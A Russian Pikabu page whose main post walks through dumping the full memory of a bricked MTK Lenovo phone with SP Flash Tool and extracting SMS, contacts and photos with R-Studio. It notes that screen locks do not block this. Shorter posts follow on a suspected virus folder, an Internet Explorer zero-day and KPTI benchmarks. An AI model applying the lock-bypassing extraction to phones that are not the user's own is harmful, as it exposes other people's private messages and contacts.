Симптомы: висит на лого "Lenovo" и больше ничего. В recovery заходит, но обновление из update.zip, закинутого в корень в бородатые года, не загружает и вываливается с ошибкой. Трэба: вытащить данные. Ну, что ж, мой первый опыт по выуживанию данных с зелёных вёдер (просто речевой оборот, ничего против Android не имею, если что). Приступим.


Первое, что нужно сделать: установить драйвер устройства. Заходим на 4pda, страница "Прошивки" конкретного девайса, и обычно там есть раздел "Драйвера и утилиты". Качаем драйвера (или автоустановщик драйверов). У меня Windows 10, и это основная проблема. Драйвера идут, как правило, на версии Windows XP, Vista и 7. Выше нет, как и ниже (олдфаги на Win95 негодуэ).

Скачали драйвер, а там вместо EXE-шника лежит какой-то непонятный INF. Лезем в диспетчер устройств (в W10 – ПКМ по "Пуску" – Диспетчер устройств"), тычем снизу на имя компьютера или название любого из разделов и сверху нажимаем "Действие" – "Установить старое устройство".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Далее – Установка оборудования выбранного из списка вручную – Далее – Показать все устройства – Далее – Установить с диска – *выбираем *.inf файл из папки с драйвером для последней версии ОС*

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше "Открыть" – ОК – Далее – Далее. Внимательно смотрим, установилось ли. Если ошибка а-ля "Драйвер не подписан, иди на йух", придётся заморочиться: нажимаем на "Пуск", зажимаем и не отпускаем Shift на клавиатуре – Жмём на иконку выключения компьютера – Так же не отпуская Shift жмём на "Перезагрузка", теперь отпускаем Shift – Выбираем "Дополнительные параметры" – "Параметры загрузки" – Перезагрузить.

После перезагрузки появляются варианты выбора. Ищем глазами "Отключить обязательную проверку подписей драйверов" (пункт 7). Жмём F7. Шиндоус загружается в обычном режиме. Повторяем действия с установкой драйверов. После этого драйвера должны встать. Если не встали – ищите более новые, с поддержкой хотя бы W8 (как показывает практика, в большинстве случаев они совместимы с W10). Если не нашли – ебаште молотком по мобиле и говорите, что так и было.


Продолжим. Дальше нам нужна софтина SP Flash Tool (прошивальщик для смартфонов на процессоре MTK). Можно найти в свободном доступе на любом сайте вроде 4pda. Желательно версию поновее, так как в старых нет возможности скопипиздить данные с смартфона. Так же нужна прошивка от данного девайса, желательно оригинальная, можно взять с того же 4pda (нам оттуда нужен scatter-файл – эдакая штуковина, в которой записано "откуда и до куда" находятся определённые разделы с данными).


В разделе Download указываем scatter (как правило, он идёт единственный в архиве с расширением *.txt, и его можно найти, немного пошароёбившись по папкам из архива с прошивкой. Кроме того, как правило, у него в названии есть слово "scatter".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше переходим на вкладку "Memory Test" и оставляем галки только напротив "RAM Test" и "Data Bus Test". Тычем "Start". Телефон к этому моменту должен быть выключен. Подключаем смартфон кабелем к компьютеру и идём пить чай, потому что процесс тестирования займёт минут 5-10 времени. Если процесс не пошёл (а это зелёная полоса снизу), попробуйте включить телефон (зажать кнопку питания на 3 секунды) или зайти в рекавери (обычно это сочетания кнопок громкости с кнопкой питания, вроде "громкость+ и питание", или "громкость- и питание", или же "обе громкости и питание". ну иногды бывает учавствует кнопка "меню", если она не сенсорная) и потыкаться там (мне помогла попытка загрузки обновления, ошибка и перезагрузка).

В результате получаем что-то вроде этого (нужно подняться чуть выше в окне результатов):

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Нас интересует строка "EMMC_PART_USER", а точнее её значение (в HEX-виде). Выделил его. У каждого процессора оно может быть разное, так что вариант "перепишу, что на скрине написано", не прокатит. Копируем в буфер обмена. Отключаем кабель от телефона.

Переходим на вкладку "Readback" и жмём "Add". Выбираем, куда сохранить файл. "Start Address" оставляем каким он и был, а в "Length" вставляем значение, скопированное из вкладки "Memory Test". В результате получаем а-ля такое:

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Тычем "Read Back" и снова подключаем телефон. Начинается процесс копирования данных с смартфона на кампухтир. Идём глушить вискарь с колой, потому что размер файла выглядит приблизительно как количество памяти в телефоне (в моём случае это 14.6Гб), и копирование, лично у меня, заняло 44 минуты. Получаем вот такой вот файл без расширения.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Дальше трэба программа R-Studio. Видел где-то софтину DiskInternals Linux Reader, но у меня она не взлетала с ошибкой "Unallocated image". Переразмечать разделы я не решился, потому что в линуксовых разделах я, мягко говоря, кусог ковна ничтожество "моя твоя не понимать". Возможно есть какие-то аналоги, но я в этом профан, так что готов выслушать конструктивные комментарии на эту тему.

Полная версия (network edition) стоит 180 бачей (по текущему курсу – 11300 русских деревянных). Но со мной всё понятно:

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Не пиратствуйте! Це плохо, дорогие мои........... Хех. Аж самому смешно.


Заходим в софтину. Тычем "Открыть образ". В поле "Тип файла" выбираем "Все файлы". Выбираем наш образ.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

*евпаторий, сколько на скрине компромата на одного меня*


Дружно смотрим в левое окно "Диски", а конкретно в раздел "Файлы образов". Тычем на файл только что открытого образа и жмём "Сканировать".

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Некоторое количество времени длится сканирование образа (у меня заняло 2 минуты и 16 секунд, как видно на скрине). Ниже образа появляются разделы "Recognized0", "Recognized1", "Recognized2" и "Raw Files". Разделы (количество и имена) могут меняться в зависимости от устройства, процессора и прошивки.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Самое вкусное (разумеется, с целью восстановления) хранится в самом большом разделе (в данном случае – "Recognized2"). Базы данных можно открыть софтиной SQLite Browser.


Root > Data > com.android.providers.telephony > databases > mmssms.db – база данных СМС/ММС. Самая "вкусная" таблица – "sms":

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Контакты хранятся в Root > Data > com.android.providers.contacts > databases > contacts.db (или contacts2.db). Их оттуда можно выудить тем же SQLite Browser, вкладка "Данные", таблица "data", поля "data1", "data2", "data3" и "data4". Придётся долго ломать голову, кто и где есть кто и где, потому что зелёное ведро записывает данные хуй пойми в каком формате очень непонятно.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Root > media > 0 – тут хранится всё, что открывается в проводнике, если подключить смартфон к компьютеру. Фото, сделанные стандартным приложением фотокамеры, обычно хранятся в DCIM > Camera

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Сейв-пикчи и некоторые данные ВКонтакта хранятся в ".vkontakte" и "VK". Viber – в "viber". WhatsApp аналогично. Телега вроде как тоже – просто в "Telegram". Тут её не было, просто на память пишу.


...


Ёптамать, хотел уже отправить пост, а главное – забыл. Как восстановить данные: тычете на файл или папку ПКМ – Восстановить.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

В окне выбираете в поле "В папку" – куда сохранится этот файл, галочки оставляете "как есть". Тычете "Да" и немножко ждёте.


Ну.. Вроде всё. Буду очень рад, если три часа написания инструкции (при учёте получаса, на который забрали электричество и я всё переписывал заново) хотя бы кому-нибудь помогут. Удачи карочи.


З.Ы. @admin, поправь уже баянометр, он показывает два поста с 100% совпадением изображения и два с 94% совпадением. Посты вообще никак с темой не связаны.

UPD: Опробовал данный способ на другом аппарате: Lenovo A7010 (MT6753) и установленной Resurrection Remix OS (Android 7.1.2). Так же в системе был установлен графический ключ и вход по отпечатку. Никаких лишних манипуляций производить не пришлось, а даже наоборот: разделы отобразились сразу же после открытия образа, даже не пришлось его сканировать.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Самое "вкусное" в разделе "userdata" (на скриншоте всеми любимые фотографии с камеры). Всё прекрасно восстанавливается, не запрашивая ни паролей, ни графических ключей.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Контакты сохранены в Root > data > com.android.dialer > databases > dialer.db . Возможно, другое расположение контактов – это частный случай, так как система – не оригинальный Android, а модифицированный, но если не найдёте файла базы в com.android.providers.telephony > databases, то посмотрите ещё и в com.android.dialer. База точно так же открывается нашим любимым SQLite Browser, и конкретно в этом случае вид вполне себе приятный: номер телефона и имя контакта в читаемом виде.

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android. Восстановление данных, Android, Windows, Длиннопост, Техника, Фотография, Текст, Инструкция

Если была установлена другая "звонилка", то, вероятно, база данных контактов лежит в папке с названием этой самой "звонилки". Название таблицы, в которой лежат номера, зависит уже непосредственно от самой "звонилки".


Ну и кусок ненужной информации под конец. Немного по теме первого телефона, с которого всё это и началось: после восстановления данных заметил, что часть фото "побито", то есть не открывается: порядка 10-20 штук из 250 фото. Последующая попытка прошивки устройства поставила всё на свои места: умерла память. Возможность считать с себя данные ещё дал, а вот залить новые – уже нет. Менять нецелесообразно: телефон сам по себе старый, на замену уже куплен новый, новая память обойдётся примерно в 3-5 тысяч, замена (если не самостоятельно) ещё 1-2 тысячи. Так что выпьем же за упокой. Ну, вроде всё: история закончена. Такие дела, малята.

Показать полностью 16
146

Жизнь компьютерного вируса

Сидит у меня в Загрузках скрытая папка, случайно ее обнаружила, неизвестно откуда она взялась...

Название ее - расширение файлов для Эппл - rsrc. Внутри -- файлы естессно, и один из них с громким названием Манифест.


В нем - требования прав администратора и обзывательства в адрес Винды, в том числе "бесхребетными дебилами".


Мне - пофигу. У меня Убунту. )))

Жизнь компьютерного вируса Windows, Вирус
189

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость 

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость  Уязвимость, Microsoft, Вирус, Безопасность, Компьютер

Эксперты по кибербезопасности из Qihoo 360 обнаружили новый вид компьютерного вируса, который успешно передаётся через 0Day-уязвимость в браузере Internet Explorer и приложениях на ядре IE.


Уязвимость нулевого дня в последних сборках Internet Explorer открывает злоумышленникам возможность установить бэкдор для вируса на компьютерах пользователей с ОС Windows через документы Microsoft Office. Для этого не обязательно постоянно пользоваться названным браузером, достаточно даже один раз, например, чтобы скачать более популярный Chrome. Нужно быть внимательным и не открывать документ MS Office, в котором "вшита" web-ссылка на установку вредоносного кода. Как только жертва открывает файл, на ПК с удалённого сервера загружаются компоненты для запуска трояна. В ходе атаки вирус использует способ обхода UAC (User Account Control, Контроль учетных записей), технику отражающей DLL-загрузки (Reflective DLL Loading), «безфайловую» загрузку и стеганографию файлов для засекречивания своей деятельности.


Корпорация Microsoft уже предупреждена об уязвимости, но пока соответствующая "заплатка" не выпущена. До этого момента эксперты по кибербезопасности рекомендуют не открывать незнакомые MS Office-документы из сомнительных источников.

24gadget

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость  Уязвимость, Microsoft, Вирус, Безопасность, Компьютер
149

Тесты заплатки для CPU Intel: производительность в играх не затронута

Источник 3DNews


В настоящее время в СМИ распространяется информация о не опубликованной ещё в полной мере уязвимости процессоров Intel, которая требует программной заплатки на уровне ядра всех популярных ОС и в теории может привести к значительному снижению производительности в самых разных задачах. Каковы же потенциальные потери от внедрения исправлений, получивших общее имя KPTI [Kernel Page Table Isolation]?

Ресурс Phoronix, освещающий связанные с развитием дистрибутивов Linux темы, решил провести ранние тесты различных задач на двух системах с ядром Linux 4.15-rc6, главным новшеством которого являются KPTI-заплатки. Уровень падения производительности ожидается в диапазоне от одной до двух цифр — в зависимости от того, как часто задача или приложение взаимодействует с изолированным в отдельной области адресного пространства ядром операционной системы. Если это простые пользовательские приложения, KTPI-обновления не должны сильно повлиять, особенно на более новых процессорах Intel с поддержкой функции PCID (Process Context Identifiers — идентификаторы контекста процесса, используемые процессором для определения закешированной информации, относящейся к различным адресным пространствам).

Тестированию в синтетических пакетах подверглись две системы: на базе Core i7 8700K Coffee Lake с Ubuntu 16.04.3 LTS и Core i7 6800K Broadwell E с Ubuntu 17.10. Компоненты тоже отличались, так что корректнее сравнивать результаты отдельного процессора с активированной заплаткой и без неё.

Например, бенчмарк файловой системы FS-Mark демонстрирует замедление на последнем ядре с Linux при активации KPTI. На системе с высокоскоростным накопителем Samsung 950 PRO NVMe SSD и i7-8700K провал оказывается чудовищным — почти двукратным. В то время как результаты системы с i7-6800K и обычным SSD Toshiba TR150 с интерфейсом SATA 3.0 проседают куда скромнее.

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Производительность обеих систем в тесте Compile Bench тоже пострадала. Если это не вызвано x86-заплатками, то в свежее ядро должны были быть внесены другие существенные регрессивные изменения (что весьма сомнительно).
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост

Работа открытой объектно-реляционной системы управления базами данных PostgreSQL стала тоже заметно медленнее:

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Аналогичная ситуация с замедлением наблюдается и в работе открытого сетевого журналируемого хранилища данных Redis на базе нереляционной высокопроизводительной СУБД:
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
В то же время скорость работы приложений, ограниченных при работе преимущественно активностью в области пользовательского пространства, будет затронута, по-видимому, минимально, если судить по тестам кодирования видео в формат H.264, задаче компиляции и декодирования видео через FFmpeg:
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Аналогичная ситуация касается и игровых задач. Судя по ранним тестам, их проблема почти не коснётся. По крайней мере, с переходом на новое ядро в Linux с заплаткам KPTI падение производительности не выходит за рамки статистической погрешности. На системе с Radeon RX Vega 64 и Intel Core i7 8700K Coffee Lake наблюдается следующая ситуация (верхняя полоска — до заплатки, нижняя — после):
Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост

Таким образом, в самых разных играх для Linux, использующих API Vulkan и OpenGL, не наблюдается сколько-нибудь заметного падения частоты кадров в результате использования ядра с обходом уязвимости чипов Intel. Как и в случае с рядом других пользовательских приложений вроде FFmpeg. В то же время ряд синтетических тестовых пакетов или специфические задачи вроде СУБД страдают порой весьма серьёзно. Похоже, рядовым пользователям беспокоиться особенно не о чем, тогда как владельцев облачных серверов на базе чипов Intel проблема, возможно, серьёзно затронет.

Между тем AMD в лице Томаса Лендаки (Thomas Lendacky) официально подтвердила, что её чипы не подвержены уязвимости: «Процессоры AMD не являются объектом тех типов атак, против которых направлены меры защиты KTPI. Микроархитектура AMD не разрешает ссылки на ячейки памяти, в том числе спекулятивные, которые дают доступ к высокопривилегированным данным в менее привилегированном режиме, когда такой доступ может приводить к ошибке страницы. Поэтому следует по стандарту отключать KPTI на процессорах AMD». Обсуждение новости уже привело к падению курса акций Intel и росту AMD.

Тесты заплатки для CPU Intel: производительность в играх не затронута Intel, Процессор, Тест, Производительность, Информационная безопасность, Linux, Уязвимость, 3dnews, Длиннопост
Показать полностью 7
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: